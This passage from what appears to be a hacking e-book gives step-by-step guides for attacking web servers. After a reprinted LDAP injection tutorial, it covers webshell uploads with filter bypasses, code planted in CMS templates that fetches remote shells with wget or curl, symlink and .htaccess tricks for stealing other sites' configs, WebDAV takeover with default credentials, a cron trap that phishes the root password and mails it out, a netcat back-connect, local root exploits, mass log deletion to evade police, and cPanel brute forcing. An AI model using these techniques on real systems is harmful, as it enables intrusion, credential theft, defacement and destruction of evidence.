    LDAP injections : ---[0x01: Introduction ] The technique of LDAP (Lightweight Directory Access Protocol) is a lightweight protocol to access the directory service X.500. This protocol works over TCP/IP. The access protocol LDAP is used to query and modify objects stored. ---[ 0x02: Filters LDAP ] It is quite important to understand how does the LDAP filters work. FC 4515 (6/2006) (http://tools.ietf.org/html/rfc4515). Filter = ( filtercomp ) Filtercomp = and / or / not / item And = & filterlist Or = | filterlist Not = ! filter Filterlist = 1*filter Item = simple / present / substring Simple = attr filtertype assertionvalue Filtertype = "=" /"~="/ ">=" / "<=" Present = attr = * Substring = attr "=" [initial] * [final] Initial = assertionvalue Final = assertionvalue Logical operators: - AND "&" - OR "|" - NOT "!" Relational operators: <=, >=, =, ~= The wildcard "*" It is used to replace characters. Filter example: (&(objectClass=user)(uid=*)): We return a list of all objects of type user, no matter
  • 84.
    which takes thevalue of the attribute "uid." ---[ 0x02: LDAP injection in Web Applications ] The technique Ldap injection is very similar to SQL injection. The attack technique is used to operate websites built LDAP judgments directly from data supplied by the user. Vulnerable code with comments (by Sacha Faust): +++++++++++++++++++++++++++++++++++++ line 0: <html> line 1: <body> line 2: <%@ Language=VBScript %> line 3: <% line 4: Dim userName line 5: Dim filter line 6: Dim ldapObj line 7: line 8: Const LDAP_SERVER = "ldap.example" line 9: line 10: userName = Request.QueryString("user") line 11: line 12: if( userName = "" ) then line 13: Response.Write("<b>Invalid request. Please specify a valid user name</b><br>") line 14: Response.End() line 15: end if line 16: line 17: line 18: filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry line 19: line 20: line 21: 'Creating the LDAP object and setting the base dn line 22: Set ldapObj = Server.CreateObject("IPWorksASP.LDAP") line 23: ldapObj.ServerName = LDAP_SERVER line 24: ldapObj.DN = "ou=people,dc=spilab,dc=com" line 25: line 26: 'Setting the search filter line 27: ldapObj.SearchFilter = filter line 28: line 29: ldapObj.Search line 30:
  • 85.
    line 31: 'Showingthe user information line 32: While ldapObj.NextResult = 1 line 33: Response.Write("<p>") line 34: line 35: Response.Write("<b><u>User information for : " + ldapObj.AttrValue(0) + "</u></b><br>") line 36: For i = 0 To ldapObj.AttrCount -1 line 37: Response.Write("<b>" + ldapObj.AttrType(i) + "</b> : " + ldapObj.AttrValue(i) + "<br>" ) line 38: Next line 39: Response.Write("</p>") line 40: Wend line 41: %> line 42: </body> line 43: </html> +++++++++++++++++++++++++++++++++++++ In line 10 note userName variable is initialized with the value the parameter user and then quickly validated to see if the value is zero. If the value is not zero, the variable userName is used to initialize the variable filter on line 18. This new variable is used directly to build an LDAP search to be used in the call to SearchFilter on line 27 The attacker has full control over what will be consulted on the LDAP server. You will get the result of the consultation when the code reaches of the line 32 to 40, all results and its attributes are displayed to the user. Example 1: http://website/ldap.asp?user=* In this example dispatched the character "*" parameter in the "user" which ends in the variable filter. This judgment LDAP will show any object that has an attribute uid. We show all users and their information. Example 2: http://website/ldap.asp?user=ka0x)(|(homedirectory=*)
  • 86.
    It will showus the path to the user ka0x. They can do tests with the code before they leave. ---[ 0x03: Links ] http://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protoc ol http://es.wikipedia.org/wiki/LDAP http://www.ldapman.org/ __EOF__ # milw0rm.com [2007-11-04] © Offensive Security 2011
  • 87.
    Part 2 Web serverHacking Using above vulnerabilities various type of hacks that can be used to hack web server. Guide content:  Shell Uploading Guide  Shell uploading through php-my-admin  Shell Jumping  Symlink Bypass 2013 forLinux Servers  Hack Web-DAV & Deface  Root server without local root exploit  LINUX SERVER ROOTING Tutorial  Cpanel Cracking  Bypass 403 ForbiddenAndCant Read /Etc/Named.Config Error  Backdoor a WEB SERVERS WITH WEBACOO  Web Server Hacking through Command Injection  How To Hack Windows Servers Using Dubrute 2.2  Symlink Tutorial for beginners  MASS DEFACETUTORIAL  How to hack a websites using Symlink Bypassing  ATTACKING WEBSERVERS VIA .HTACCESS  How to Back-connect withnetcat  Hacking Cold FusionServers - Part I  Hacking Cold FusionServers - Part II
  • 88.
    So let’s getstarted ! 1. Shell Uploading Guide Many newbie’s face problem while uploading shell on a site after getting admin access/ logging in to that site. So, I am writing this in order to help them. Basically shell gives us remote access to that server. Such shells are available in different language like php, asp/aspx, cgi etc. So, we have to choose a shell that will work on the server according to the server script. If the server supports php shell then we have to choose any of the php shell Otherwise asp & cgi. now, let’s come to the Main point…. AFTER LOGGING IN TO THE SITE IF WE FOUND ANY UPLOAD OPTION IN THE SITE , THEN WE CAN EASILY UPLOAD SHELL. But sometimes we have to do some changes to upload a shell. Way 1 AS THE SHELL IS IN PHP FORMAT, SOMETIMES SOME SITES DOES NOT ALLOW UPLOADING SUCH SCRIPTS DIRECTLY WITH THE PHP EXTENTION. If so happens then just rename the shell name. Add .gif/.jpg/.html/.doc etc. Example: suppose before renaming the shell name was shell.php, then we will rename it as shell.php.jpg or anything else. Way 2 Upload a simple uploader shell first that isn’t detected by Antivirus and firewalls. THEN UPLOAD YOUR SHELL THROUGH YOUR OWN SHELL. YOU CAN DOWNLOAD A UPLOADER SHELL FROM HERE .
  • 89.
    WAY 3 FEW FIREWALLOF THE SERVER DETECTS THE SHELL SCRIPT BY CHECKING THE headers & don’t allow us to upload a shell. so we can bypass it by using “GIF89A SHELL SCRIPT BYPASS” Method. open your shell in notepad. add “GIF89a;” without quote before the shell code starts. liKe below… GIF89a; Depending on what kind of file validation they are using this may fool the Server Into thinking its a image since when it reads the file it finds the gif header and assuMes its safe since it’s a iMage. WAY 4 This method is more advanced. This only works for client side filters rather than server side. download firebug for Firefox, then edit the html of the upload . <form enctype="multipart/form-data" action="uploader.php" method="POST"> Upload DRP File: <input name="Upload Saved Replay" type="file" accept="*.jpg"/><br /> <input type="submit" value="Upload File" /> </form> Change the filter accept. to *.* or just remove it completely , it will then let you upload any type of file. WAY 5 Download “LIVE HTTP HEADERS” addon first for your firefox browser 1. Rename your shell name to shell.php.jpg (or whatever that site supports. In my case, site supports only jpg file. Thats why i renamed it to shell.php.jpg.) 2. Open Firefox & Start your Live HTTP Headers addon, after that upload your shell. 3. Then your Live HTTP Headers will look something similar to this
  • 90.
    4. Then clickon the shell.php.jpg, after click on Reply button. 5. Then again a new window will open, in that window there will be two boxes, but we have to work on second box. 6. In the second box, rename your shell.php.jpg to shell.php, then again click on Reply button
  • 91.
    WAY 6 Find yourselfa copy of edjpgcom.exe "edjpgcom is a free Windows application that allows you to change (or add) a JPEG comment in a JPEG file." Usage: -- edjpgcom "filename.jpg" Now add this to the jpg comment since you wont be able to drop a whole shell in there due to limits etc. "; system($_GET['cmd']); echo ?> now rename your jpg to .php and upload. WAY 7 Another way you can fool the web server into thinking your uploading a image instead of a php shell is to get Firefox and install the “tamperdata” Add on then click start tamper and upload your php shell then tamper the data and change the content-Type from 'application/octet-stream' to 'image/jpeg'. If u have any problem to upload a shell using tamperdata, then just do a simple google search. So many video tutorials on this is available in web. So I am not explaining this step by step.
  • 92.
    WAY 8 All theabove mention way works when we find an upload button on the site. but when there is no upload button, it’s not easy to upload a shell there. we can try few things…… We have to find out if there is a edit option of an existing php/asp/aspx page. If there is a edit option then open that page & delete whole script. After that, open your shell in notepad. Copy the script, paste to that page. Finally, save it. Now that link will be your shell. possibly we can find edit option in the following pages of a site…… Contact us.php/ Contact us.asp Class.php/ Class.asp About us.php/about us.asp Terms.php/terms.asp nb: in some news, vehicles shelling, cart etc sites, don’t have any option to upload a file after logging in through admin panel. They only allow file upload after logging through cpanel. WAY 9 SOME TIMES, IN SOME REMOTE FILE INCLUSION Vulnerable SITES, WE HAVE TO EXECUTE A SHELL FROM ANOTHER HOSTINGSITE. METHOD…….. 1) UPLOAD YOUR SHELL IN A FREE HOSTINGSITE LIKE www.my3gb.com www.3owl.com , www.ripway.com , , www.000webhost.com , etc. 2) Now suppose your shelled site link is www.example.my3gb.com/c99.txt & YOUR VULNERABLE SITE IS www.site.com 3) Now we have to execute this following command to gain shell access to that site. http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt 4) REPLACE THE SITE LINK IN THE COMMAND ACCORDINGTO YOUR SHELL & VULERABLE SITE LINK. SHELL UPLOADING IN joomla, wp, vb, smf, ipb, mybb SITES IN THOSE ABOVE MENTIONED SITE WE CANT FIND DIRECT UPLOAD OPTION GENERALLY. SO WE HAVE TO DO THEM IN OTHER WAYS. 1.Joomla Site: After Login into adminpanel u will find Extensions on 5th No. expand this click on it > template Manager > check on any template (like beez,ja_purity) Now click on Edit (right upper side) after this click on Edit html now paste ur shell code and click save...done site.com/templates/template name/index.php like site.com/templates/beez/index.php 2.Wordpress: login into admin panel expand Appearance then click on editor > u will find style.css now select 404.php on right side paste ur shell code and click edit file u can find shell in site.com/wp-content/themes/theme name u edit/404.php
  • 93.
    3.Vbulletin: 1-Log in admincp 2-Under “Plugins & Products”,select Add New Plugin 3-Adjust the settings as follows: Product: vBulletin Hook Location: global_start Title: (Anything …) Execution Order: 5 Code: ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean(); Plugin is Active : Yes 4-After the plugin is added, go to the heading “Style and Design”, select “Style Manager 5-Under whatever the default style is in the dropdown menu, select Edit Templates. 6-Scroll ForumHome models and expand. Click [Customize] beside FORUMHOME. 7-Search Code: $header Somewhere near the top.Replace it with: Code: $header $execcode 8-Now go to the forum and add after the index.php Code: ?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php So it looks like Code: http://www.site.com/pathtoforum/index.php?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php What this does is shell.txt downloads, and renames shell.php Now, the shell must be located in the directory shell.php forums … If not, then wget is disabled on that server,you can try alternative methods: http://www.site.com/pathtoforum/index.php?cmd=curl http://www.site.com/shell.txt > shell.php http://www.site.com/pathtoforum/index.php?cmd=GET http://www.site.com/shell.txt shell.php 4.SMF: login into admin panel u need to download any smf theme in zip format and put ur shell.php in it and save admin panel > select Themes and Layout > Install a new theme > browse and upload theme thats have our shell.php :) after upload shell will find > site.com/Themes/theme name/shell.php
  • 94.
    5.IPB: login admin panel> Look and Feel >Manage Languages, choose language > section (example) public_help edit: help.txt Choose topic from list, or search for a topic In right box add the below code: ${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv shell.txt shell.php'}} ${${system($query,$out)}} ${${print $out}} When you add it, specify go on bottom Now we go on http://www.site.com/index.php?app=core&module=help And our code we add will be done, and you will get your shell @ www,site.com/cache/shell.php 6.phpBB login into admin panel > go on styles -> templates -> edit, for Template file choose faq_body.html At down of: We add: fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i])); And save it.Now go on: www.site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shel l.txt shell find in site path/shell.php Mybb forum login admincp > Go to Templates and Styles, find default MyBB Theme is. Then go to Templates, expand templates that are used by the current theme. Find Calendar templates, click it. Click 'calender'. Above all the html code, paste this:http://pastebin.com/nA3asuNz save :) shell will b find in site.com/calendar.php note: if u got error like "code is danger unable to edit " then simply paste ur deface code to deface calendar.php
  • 95.
    Tutorial shell uploadingthrough phpmyadmin Requirements:- -You must have the full path -pma & mysql db privileges. Its not every day u get to use this its rare, but today i exploited a site by this so thought of writing a tutorial. Ok then lets start. First login in to mysql now click 'Show MySQL system varible"
  • 96.
    then 'SQL'. now youcan run sql commands,like create db, delete tables or whatever. we want to upload shell so lets move on to it. now we will create a cmd line into a new file,with select into. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "full/path/here/cmd.php" and click 'Go'. Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell. wget http://www.r57.biz/r57.txt;mv r57.txt shell.php N thats it, we have shell on the server xD
  • 97.
    Shell Jumping Requirement :shell b374k (Click On the link you will get a php file just right click and select save or press ctrl+ s From Keyboard save it by any name like hacker.php, myshell.php or darksite.php ) Follow these steps  Now after uploading shell Click On Local Domain To view all websites based on same server Check for readable  Now choose any website from Local host domain list and copy Senarai User value then goto home and paste in view file/folder after home/replacethiskeyword/public_html/ for example current view file/folder value = home/abc/public_html and your website's Senarai User value (username) is xyz then view file/folder value will be home/xyz/public_html/  After Going to that Folder Look for MySQL confiq (wp-config.php in wordpress and configuration.php for joomla ) now open The file and you'll Got database username and password here : it will Looks like Username = /** MySQL database username */ define('DB_USER', 'googlyma_wrdp1');
  • 98.
    PASSWORD = /** MySQLdatabase password */ define('DB_PASSWORD', 'PHZ2hum6{{KE');  Now Conncet to MYSQL datbase with username and Password and enter this SQL Query UPDATE wp_users SET user_pass =md5( '123456') WHERE user_login = 'admin';  Now what we have did it goto : http://webste.com/wp-admin/and login with Username and password Log in with user name admin and password as 123456 And You have successfully done it.
  • 99.
    Symlink Bypass 2013for Linux Servers Note : This method is not applicable for Godaddy , Bluehost , Hostgrator and Hostmonstor Servers . For This First You Need the Following Files :  Sen Haxor CGI Shell  sen.zip  passwd-bypass.php  Turbo Brute force Cpanel  Port.py First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server . Use the Following Code : Make a php.ini with the following code safe_mode=Off And ini.php with 
  • 100.
    <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echoini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["ss"]); ?> So after creating php.ini and ini.php upload the other files to the server . BYPASSING SYMLINK ON PLESK , DEBIAN , CENTOS & REDHAT SERVERS Now i will explain how to bypass symlink on Plesk , Debian , Centos and Redhat Commonly all of the above have root path like /root/var/www/vhost/ where all sites will be under vhost directory . But you wont have permission to view it so we will create a symbolic link to root and view the site and symlink the config files Make a new directory in your shell example sen then upload sen.zip . Then use this command to unzip the file and create a symbolic link to root . Command : unzip sen.zip Note : In some servers unzip command wont work so you can manually create a symlink to root by using the command ln -s / root Then You will see this $ unzip sen.zip Archive: sen.zip
  • 101.
    linking: sen.txt ->/ finishing deferred symbolic links: sen.txt -> / This means a symbolic link has been created to / root .  Now we need to upload .htaccess use the following Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php Done Bypassed Now View /var/www/vhost/ and you will be displayed with all sites . BYPASSING SYMLINK ON APACHE AND LITESPEED Mostly when you try to symlink apache in 2013 server you will face 403 forbidden or 404 not found and 500 Internel Server Error These can be Bypass By Using Different .htaccess individually. BYPASSING SYMLINK ON APACHE & LITESPEED - Linux Servers . First for this make a new directory in your shell example sen then upload sen.sa and .htaccess from the Sen Haxor CGI shell which i added the download link at the end of the Tutorial After uploading .htaccess and sen.sa to a new directory sen chmod sen.sa to 0755 Then Open the Cgi Shell Login ( Password : senhaxor) Now there are several methods to bypass 403 forbidden You need to try all the following methods . Atleast one will give you success . Method 1 : .shtml method This is the commonly used method by most of the hackers to bypass 403 forbidden Error . So before we procced first you need to get all /etc/passwd from the server so that we can find the username and path of where the sites are located . 2013 Server mostly Many functions are enabled which shows 403 forbidden when you try to read cat /etc/passwd from the server
  • 102.
    so i madea Powerfull Shell which can bypass and get /etc/passwd from the server. I will also add it to the Downloads. Upload the /etc/passwd bypasser shell and get all /etc/passwd Then Login to Sen Haxor CGI Shell and create a symbolic link to your Target  Step 1 : ln -s / root  Step 2 : ln -s /home/username/public_html/config.php 1.shtml Example if our site is www.site.com and username is site and its Wordpress ln -s /home/site/public_html/wp-config.php 1.shtml So we created a Symbolic link to our Target now you need to Go to Your Shell and Edit the .htaccess with the following Code : Options +FollowSymlinks DirectoryIndex itti.html RemoveHandler .php AddType application/octet-stream .php Once you done this Open the 1.shtml on your Browser and rightclick and view source . You will be able to View the Config . This is the common way of Bypass 403 forbidden and Litespeed . Now Let Me Explain You the Advanced Method =) Method 2 : Bypassing Symlinked Config From Cpanel For This You need atleast One Cpanel Access on the sever . I will tell you how to easily crack Cpanel . First Run This Command : ls /var/mail Then you will be displayed with all username from the server Copy all . Now Upload Turbo Brute Force Cpanel Script ( i will attach it will the downloads). Open the Script and in User Paste all the username we got . And for Password here is the wordlist :
  • 103.
    Copy All andPaste it on Password Select Simple and Click Submit If Your lucky you will be displayed with cracked cpanels. Once you got a cpanel on the server You can Bypass 500 Internel Server Error 403 Forbidden Error From Port :2077 and From error-pages from file manager. Just symlink the config ln -s /home/user/public_html/wp-config.php config.shtml Login to the cpanel Then Go to File Manager -> Error Pages Then Choose any of these according to what error is triggered when you open your symlinked config 400 (Bad request) 401 (Authorization required) 403 (Forbidden) 404 (Not found) 500 (Internal server error) Example "&file=400.shtml&desc=(Bad request) we can get the config by "&file=config.shtml& desc=(Bad request) BYPASS SYMLINK FROM PORT 2077 So once you Symlinked the Config You can just login to port 2077 Then public_html/path/config.shtml You will be able download the config.shtml and you can view the source . Method 3 : Symlink Bypass via Open Port using Python For this First we Python to be Installed on Server. To check if Python is installed run this command python -h If its install we can use the following python script and Bypass
  • 104.
    #!/usr/bin/env python # devilzc0de.org(c) 2012 import SimpleHTTPServer import SocketServer import os port = 13123 if __name__=='__main__': os.chdir('/') Handler = SimpleHTTPServer.SimpleHTTPRequestHandler httpd = SocketServer.TCPServer(("", port), Handler) print("Now open this server on webbrowser at port : " + str(port)) print("example: http://site.com :" + str(port)) httpd.serve_forever() I have added the script to downloads . Now Upload the script to the shell http://foto.pk/images/205cjg3.jpg now run this command : python port.py http://foto.pk/images/2je1wqq.jpg Now Open the site with port 13123 www.site.com:13123
  • 105.
    http://foto.pk/images/j5ifwm.jpg Server Bypassed FromOpen Port . Method 4 : Bypassing Symlink Using .ini Method Login to Sen Haxor CGI shell normally create a symlink to your target in .ini Extension . ln -s /home/user/public_html/wp-config.php config.ini now go to the shell and make a new file a.shtml Paste the following code inside it and save it <!--#include virtual="config.ini"--> and save it . Now open the a.shtml in the browser and right click and view the source . Done Bypassed Method 5 : Bypassing Symlink Using ReadMe file Make a new directory in your shell From the Cgi shell normally symlink the config ln -s /home/user/public_html/config.php config.txt now make .htaccess with the following code . .htaccess Options All ReadMeName config.txt Now when you open the directory on the browser you will be displayed with the config source directly . eg : site.com/sen/config.txt is your symlinked config then when you open www.site.com/sen/ you symlinked config will be displayed as a ReadMe content . Thats it i have explain All the Methods to Bypass Symlink If you will have problem Bypassing Try all the Following .htaccess 1 - > .htaccess Options Indexes FollowSymLinks DirectoryIndex ssssss.htm
  • 106.
    AddType txt .php AddHandlertxt .php 2 -> .htaccess Options All DirectoryIndex ssss.html addType txt .php AddHandler txt .php <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> 3 -> .htaccess suPHP_ConfigPath /home/user/public_html/php.ini 4 -> .htaccess Options +FollowSymLinks DirectoryIndex Sux.html Options +Indexes AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html 5 -> .htaccess Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php
  • 107.
    <IfModule mod_autoindex.c> IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble </ ifModule> <IfModulemod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> .HTACCESS TO BYPASS DISABLED FUNCTIONS This one is to make python work : .htaccess AddType application/x-httpd-cgi .py AddHandler cgi-script .py AddHandler cgi-script .py This one is to make perl work : .htaccess AddType application/x-httpd-cgi .pl AddHandler cgi-script .pl AddHandler cgi-script .pl
  • 108.
    This one isto enable Symlink if the function is disabled in the server : .htaccess <Directory "/home"> *** Options -ExecCGI* *** AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks </ Directory> This one is to retrieve users permissions : .htaccess AddType text/plain .php Options +Indexes DirectoryIndex filename.html Bypass Internal Server error : .htaccess <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> Change php version: .htaccess AddType application/x-httpd-php4 .php
  • 109.
    Bypass Uploads Optionsand upload shell in another extension : <FilesMatch "^.*.mp3"> SetHandler application/x-httpd-php </FilesMatch> Retrieve Config with picture method : .htaccess Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .gif AddHandler cgi-script .gif AddHandler cgi-script .gif DOWNLOAD LINK OF THE SCRIPTS I HAVE USED ON THE TUTORIAL : www.mediafire.com/download/08oeos9cpaloeum/Bypass_Symlink_on_2013_Server_With_Diff erent_.htaccess_and_Methods_by_Sen_Haxor.rar So thats it i think i had covered everything thats related to Bypass Symlink and Disabled Functions on Server . If you still face Problem in Symlink Contact me : www.facebook.com/cheenu.vis Greetz : Lucky - Ashell - Ethicalnoob - Striker - Zagar Yasir - CyberAce Legion - Yash bro - Godzilla - Architkp - RooT_Devil -Navneeth Singh - Cyberboy India- Cooltoad_ICA - Suriya Prakash - Avinash Mohiti - Ion -Shorty420 - Suriya Subash - Darkw0lf - Manoj Nath -Sksking Decoder - Rafay Bolach -Mike Wals - Team Indishell and all Indian Hackers
  • 110.
    Hack WebDAV &Deface Alright guy's today in this tutorial I'll be explaining how to use the webdav exploit. The link for the tools used for this tutorial can be found in the bottom of this tutorial. For those of you who do not know what a Webdav is here is the definition. Web-based Distributed Authoring and Versioning, or WebDAV, is a set of extensions to the Hypertext Transfer Protocol (HTTP) that allows computer- users to edit and manage files collaboratively on remote World Wide Web servers. But fo our purpose we will be using it to exploit RDP's or the Remote Desktop Protocol. For a better understanding of these with RDP's they could range from Vp's to Dedi's to just plain old home Pc's, but no matter what it is you will gain full access to the machine and can basically do whatever you want using a shell. For those of you who are new to the hacking scene a shell is a php script that allows you to view all of the files on the server you decide to host the shell on. The most common shells are the c99 or the r57, but in this case we will be using the c99. Now please be aware these are not the only shells available there are several posted throughout the forum and you can find them by simply using the search button located on the navbar. Now before being able to use the shell we have to find some vulnerable Ip's to gain access to for this we will be using the WebdavlinkCrawler which can be found in the webdav tools kit I have provided below here if you don't trust my download links simply don't download them it's that simple. Once you have managed to open the program you will be presented with this interface.
  • 111.
    as you cansee there is a Start, Stop, and Remove double. All of these terms will be explained later on, but what you are going to want to do is click the start button and it will being to search for the Ip's with webdav in them. Once you have managed to gather some ip's like you see in the picture here Now please be aware this was only with about 15 seconds of searching and your results may differ depending on your connection speed as well as the amount of time you run the application. After you have all of your Ip's your going to want to click one so it's highlighted and the right click it you will be presented with a popup that looks like this I have no idea what that actually means,(if someone would like to translate and tell me please feel free.) but what it is doing is copying all of the Ip's you have scanned. After you have scanned all of the Ip's your going to want to paste them in a new word document
  • 112.
    once you havedone so save it as something you can remember and put it in a convenient location. After you have saved your collected webdav Ip's in a word document your going to want to open the Ip Scanner in the folder. It will look like this what your going to want to do is click the "Get Ip's" button and browse to your recently saved text file. After you have your ip's in place
  • 113.
    your going towant to press the scan button what this is doing is now taking all of your Webdav Ip's and figuring out which one's are vulnerable to this particular exploit. The one's on the right are the ones it scanned and if you happen to get any in the middle those are the one's you can exploit. In my case this time I didn't happen to have any that were open to this exploit because I had a limited amount of Ip's. After you have managed to gather some ip's in the middle column and are ready to exploit the server you can just double check by going to the ip/webdav/ in your browser and Ip being one of the exploited ones you managed to get and your going to be looking for an index page that says Webdav Test page. After you have confirmed it is ready to go your going to want to open "map network drive" this can be found by either right clicking Network or my computer in the start menu. what your going to want to click on is the hyperlink that reads " Connect to a website that you can use to store your document's and pictures. You will be presented with a screen all you have to do is click next. And the your going to want to click Choose a custom network location.
  • 114.
    Now this isthe important screen it should look like this What you have to do is put the Ip/webdav in the text box and click next
  • 115.
    you should thenbe prompted with a login box the default username is wampp and the default password is xampp. Once you have successfully connected you can now browse it's folder's so what you have to do now is just drag and drop the shell.php in side the main directory After doing so go to ip/webdav/shell.php it should look like the following
  • 116.
    Feel free touse that Ip if you are that much of a noob and cannot do anything for yourself. Once you are viewing your shell inside the execute textbox your going to want to do the following commands net localgroup administrators SUPPORT /Add What this is doing is making the remote desktop username SUPPORT and the password !password!. So now the last and final step is to open remote desktop and connect using the Ip and the login detail's we have just created. The shell is for you to explore and discover for yourself. Now you may be wondering What can you do once your in? Answer : 1.You can do so much! Plant Rootkits/ Upload your RAT on the server:D 2. I upload my RAT’s incase they try to take back there dedi. 3. Host a web IRC bot or Shell Booter 4. Store files or host websites or shells 5. Make a Botnet! TOOLS: http://dl.dropbox.com/u/18083172/Webdav%20tools.rar
  • 117.
    Root server withoutlocal root exploit Many hackers find it difficult to find a local root exploit for rooting the server. So here is few methods you could try to gain root acess without using a local root exploit! 1. Custom Cron Tab Scripts Cron Jobs are some Tasks that are set to be Executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error Message and the Root user will probably type in his password. First, check out if there are any Cron Job Tasks: crontab -l If you see any Custom Script, we must Check out if we can Write on it. Let’s say we got a Custom script here: /bin/cronscript To check if we can Write a File, type: stat /bin/cronscript (If you get something like: “-rwxrwxrwx” in the output, you can edit the File!) Let’s edit the file and send a Fake Error Message. Make a Copy of the Original Script to /bin/cronscript.bak : cp /bin/cronscript /bin/cronscript.bak Edit the /bin/cronscript like this: #!/bin/sh echo “An System Error Occured!” echo “” echo “Error Code: #131425″ echo “” echo “Update to get the Latest Patch for this Security Issue.” read -s -p “[sudo] password for root ” rootpasswd echo “” echo “su: Authentication failure”
  • 118.
    echo “” sudo apt-getupdate && sudo apt-get upgrade sudo echo “The Password is: $rootpasswd” > .kod mail -s “Root’s Password” “ email@address.com ” < .kod rm .kod mv cronscript.bak cronscript You should just Replace the Underlined with your E-Mail and the Name of the Script! After you save the File, type: chmod +x cronscript to set it as Executable! This script will: - Send a Fake Error Message - Request for the Root’s Password - Send to your E-Mail Address the Password (make sure that there is the “ mail ” command at the /bin ) - Restore the Original File When the Script gets Executed, the Root User will Enter his Password and it will be send to you! It would be better if you had some knowledge on Bash Programming… 2. Enumerating all SUID Files An SUID File is any file that any User group has the Priviliges to Access, Read and Write on it. What does this mean for you: You can Escalate Priviliges in this way, if it is in an Important Directory. you can Social-Engineer a Privileged User. To find all SUID Files, type: find / -user root -perm -4000 -print This will show all the SUID Files to your Terminal. Take your time and check them as they can help you to escalate Priviliges! 3. Brute Forcing I know what you are thinking after seeing the title, well this is different the tool we gonna use is called Rootdabitch What is so special in this?
  • 119.
    The magic aboutthis tool is that It works in background, so you can leave it working for days until you have results... when the password is cracked it will be mailed to you :) For this, you need to have phpshell/ reverse shell / ssh access to the target to run this tool, You can get the tool here Rootdabitch v0.1 Usage: ./rootdabitch.sh youremail@site.com For kiddies: First download rootdabitch to the server: wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip Extract it by the following cmd: unzip rootdabitch-0.1.zip Chmod it to 755: chmod + x rootdabitch.sh Finally run the script ./rootdabitch.sh youremail@site.com Simply just chmod it and run the script. If the password is cracked you will have a mail containing the root password which will be in the file "passwords.txt" attached to the mail
  • 120.
    LINUX SERVER ROOTING HelloHax0rtools.com Readers today i will show you how to root a server Root is the Administrator of all server. If someone got root access he can do anything with server like delete and copy anything on server ; can deface all the home pages (massive deface ) Although there are mainly 3 wayz in which you can get into the server but here we will take the first method that is by local root NEEDS :  Netcat (Download from Here)  Shelled site (Best Shellz Here)  Local root exploit (which you can find it Here Or Download This collection Here) STEPS:  In RUN program type cmd then type this cd C:Program FilesNetcat but first save your netcat in the directory
  • 121.
    After it typethis : nc -n -l -v -p 443 , and you will get this - Now open the url in which you had upload your shell and then connect it using back connect option in the shell(Be careful some shell do not have this option and do not use any proxy,tor or VPN), when connection is established you will get something like this - Now you have successfully connected .. then we have to get the local root exploit like now we have 2.6.18-374 2011 .
  • 122.
     Now wehave to first upload our exploit in a writable folder, simply we can just change the directory to the /tmp folder which is a standard writable folder . command to change dir to /tmp : cd /tmp  To upload your your exploit we will use the wget function . Now Type : wget http://www.example.com/exploit.c Now exploit will be uploaded to tmp folder (CASE TYPE 1) if you have uploaded your exploit as (exploit.c) the we have to compile it, so to compile it we will type the following command .
  • 123.
    Type : gccexploit.c -o exploit Note that above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit. (CASE TYPE 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command . Type: unzip exploit.zip  After we have done all the above steps correctly, its time to give permission so we will type the following command Type: chmod 777 exploit  Now its time to run the Exploit, to run the exploit we will type the following command Type: ./exploit Now the exploit will run & the server will be rooted ;) . To check weather we got root we can type Type: id or whoami NOW HOW TO CLEAR THE LOG AND COME OUT SAFELY FROM SERVER If you do not want to caught yourself by Cops then delete the log using following commands rm -rf /tmp/logs rm -rf $HISTFILE
  • 124.
    rm -rf /root/.ksh_history rm-rf /root/.bash_history rm -rf /root/.ksh_history rm -rf /root/.bash_logout rm -rf /usr/local/apache/logs rm -rf /usr/local/apache/log rm -rf /var/apache/logs rm -rf /var/apache/log rm -rf /var/run/utmp rm -rf /var/logs rm -rf /var/log rm -rf /var/adm rm -rf /etc/wtmp rm -rf /etc/utmp history -c find / -name *.bash_history -exec rm -rf {} ; find / -name *.bash_logout -exec rm -rf {} ; find / -name "log*" -exec rm -rf {} ; find / -name *.log -exec rm -rf {} ; i hope you had learn how to root a server My next Tutorial will be about How to mass deface after rooting a server.
  • 125.
    Cpanel Cracking Things Required:-  Shelled site ( Download Best Shellz Here)  Cpanel Password Cracker (Download Password : www.hax0rtools.com) Step By Step Tutorial :-  First open you shell & upload the cpanel password cracker shell  Then go down & click on User .  Now after you have clicked on User, below you will get all the usernames of the Cpanel . So now move to next step, your next step will be to get a good Password list for a Dictionary attack . After getting it you have to copy the username & paste it in the username block (above) & paste the password list in the password block .Then finally click on start .
  • 126.
    Tip: Password listshould be short & effective .  When the cracking is finished, you will see the result .  After Getting the login info you can login by going to -> www.site.com:2082 or www.site.com/cpanel
  • 127.
